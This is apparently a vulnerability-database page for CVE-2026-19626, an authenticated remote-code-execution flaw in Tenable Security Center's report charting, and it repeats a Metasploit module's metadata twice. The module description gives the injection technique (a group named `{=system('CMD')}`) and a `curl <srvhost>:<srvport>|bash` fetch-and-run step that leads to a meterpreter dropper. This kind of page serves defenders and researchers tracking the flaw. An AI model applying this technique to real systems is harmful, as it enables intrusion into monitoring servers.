Tenable Security Center Report Charting RCE
cve CVE-2026-19626 1 source, 1 claim · Watch
Metasploit exploit modules writes:
Tenable Security Center prior to 6.9.0 allows an authenticated, non-administrative user to achieve code execution as the web service account (tns) through report generation. A report definition's inline style is discarded at render (components rehydrate styles from the Style tables by styleID), so the payload is delivered through a label instead: a group created with the name `{=system('CMD')}` is accepted verbatim and becomes a pie sector label via a user/sumgroup query; `{label}` substitution runs BEFORE the eva… the claim
Tenable Security Center prior to 6.9.0 allows an authenticated, non-administrative user to achieve code execution as the web service account (tns) through report generation. A report definition's inline style is discarded at render (components rehydrate styles from the Style tables by styleID), so the payload is delivered through a label instead: a group created with the name `{=system('CMD')}` is accepted verbatim and becomes a pie sector label via a user/sumgroup query; `{label}` substitution runs BEFORE the eva… the claim
What each source says
| Property | Source | Said | Means here |
|---|---|---|---|
| Platform platform | Metasploit exploit modules | Linux,Unixreceipt
What the source handed over{
"aliases": [],
"arch": "cmd",
"author": [
"h00die"
],
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"check": true,
"default_credential": false,
"description": "Tenable Security Center prior to 6.9.0 allows an authenticated,\n non-administrative user to achieve code execution as the web service\n account (tns) through report generation.\n\n A report definition's inline style is discarded at render (components\n rehydrate styles from the Style tables by styleID), so the payload is\n delivered through a label instead: a group created with the name\n `{=system('CMD')}` is accepted verbatim and becomes a pie sector\n label via a user/sumgroup query; `{label}` substitution runs BEFORE\n the eval loop, so the payload lands inside the format string and\n fires at chart render. Regular org users can create both; report\n launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.\n\n Payload constraints: the {=...} regex is non-greedy to the first\n closing brace, so the expression may not contain one, and PHP string\n interpolation applies; this module therefore injects only\n `curl <srvhost>:<srvport>|bash`\n (a bare host:port GETs / and bash reads the served script from\n stdin). The served script itself has no such limits, which the\n Linux Dropper target exploits with a fetch payload\n (cmd/linux/http/...) that downloads and execs a full native payload\n (e.g. x64 meterpreter) from the payload adapter's own listener on\n FETCH_SRVPORT.\n\n Report definitions are closed to administrators (creation returns\n error 163); supply credentials for a regular org user.\n\n Tested against SecurityCenter 6.7.2-14 on RHEL9.",
"disclosure_date": "2026-08-13",
"fullname": "exploit/linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"is_install_path": true,
"mod_time": "2026-08-25 09:35:26 +0000",
"name": "Tenable Security Center Report Charting RCE",
"needs_cleanup": null,
"notes": {
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Stability": [
"crash-safe"
]
},
"path": "/modules/exploits/linux/http/tenable_sc_report_charting_rce_cve_2026_19626.rb",
"platform": "Linux,Unix",
"post_auth": true,
"rank": 600,
"ref_name": "linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"references": [
"URL-https://www.tenable.com/security/tns-2026-22",
"CVE-2026-19626"
],
"rport": 443,
"session_types": false,
"targets": [
"Unix Command",
"Linux Dropper"
],
"type": "exploit"
} | — |
| Rank rank | Metasploit exploit modules | 600 Excellent. Cannot crash the service. A memory-corruption exploit does not qualify. receipt
What the source handed over{
"aliases": [],
"arch": "cmd",
"author": [
"h00die"
],
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"check": true,
"default_credential": false,
"description": "Tenable Security Center prior to 6.9.0 allows an authenticated,\n non-administrative user to achieve code execution as the web service\n account (tns) through report generation.\n\n A report definition's inline style is discarded at render (components\n rehydrate styles from the Style tables by styleID), so the payload is\n delivered through a label instead: a group created with the name\n `{=system('CMD')}` is accepted verbatim and becomes a pie sector\n label via a user/sumgroup query; `{label}` substitution runs BEFORE\n the eval loop, so the payload lands inside the format string and\n fires at chart render. Regular org users can create both; report\n launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.\n\n Payload constraints: the {=...} regex is non-greedy to the first\n closing brace, so the expression may not contain one, and PHP string\n interpolation applies; this module therefore injects only\n `curl <srvhost>:<srvport>|bash`\n (a bare host:port GETs / and bash reads the served script from\n stdin). The served script itself has no such limits, which the\n Linux Dropper target exploits with a fetch payload\n (cmd/linux/http/...) that downloads and execs a full native payload\n (e.g. x64 meterpreter) from the payload adapter's own listener on\n FETCH_SRVPORT.\n\n Report definitions are closed to administrators (creation returns\n error 163); supply credentials for a regular org user.\n\n Tested against SecurityCenter 6.7.2-14 on RHEL9.",
"disclosure_date": "2026-08-13",
"fullname": "exploit/linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"is_install_path": true,
"mod_time": "2026-08-25 09:35:26 +0000",
"name": "Tenable Security Center Report Charting RCE",
"needs_cleanup": null,
"notes": {
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Stability": [
"crash-safe"
]
},
"path": "/modules/exploits/linux/http/tenable_sc_report_charting_rce_cve_2026_19626.rb",
"platform": "Linux,Unix",
"post_auth": true,
"rank": 600,
"ref_name": "linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"references": [
"URL-https://www.tenable.com/security/tns-2026-22",
"CVE-2026-19626"
],
"rport": 443,
"session_types": false,
"targets": [
"Unix Command",
"Linux Dropper"
],
"type": "exploit"
} | — |
exploit
| Tenable Security Center Report Charting RCE zetlyn/cve-metasploit · 2026-08-13 | platform Linux,Unix rank 600 | source |